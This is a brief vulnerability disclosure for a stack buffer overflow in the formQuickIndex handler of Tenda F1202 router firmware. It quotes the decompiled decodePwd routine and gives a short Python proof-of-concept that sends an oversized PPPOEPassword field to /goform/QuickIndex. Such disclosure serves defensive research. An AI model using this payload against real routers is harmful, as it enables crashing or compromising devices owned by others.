- Firmware download website: https://www.tenda.com.cn/download/detail-2671.html
F1202 V1.2.0.20(408)
The Tenda F1202 V1.2.0.20(408) firmware has a stack overflow vulnerability in the formQuickIndex function. The v5 variable receives the PPPOEPassword parameter from a POST request and is later assigned to the v7 variable, which is fixed at 72 bytes. However, since the user can control the input of PPPOEPassword, in function decodePwd, the statement:
_BYTE *__fastcall decodePwd(_BYTE *a1, _BYTE *a2)
{
_BYTE *result; // $v0
_BYTE *v3; // [sp+8h] [+8h]
_BYTE *v4; // [sp+Ch] [+Ch]
v3 = a1;
v4 = a2;
result = a1;
if ( a1 )
{
result = a2;
if ( a2 )
{
while ( *v3 )
{
if ( *v3 == 92 )
++v3;
*v4++ = *v3++;
}
result = v4;
*v4 = 0;
}
}
return result;
}can cause a stack overflow. The user-provided PPPOEPassword can exceed the capacity of the s array, triggering this security vulnerability.
import requests
from pwn import*
ip = "192.168.84.101"
url = "http://" + ip + "/goform/QuickIndex"
payload = b"a"*1000
data = {"mit_linktype":"2","PPPOEPassword": payload}
response = requests.post(url, data=data)
print(response.text)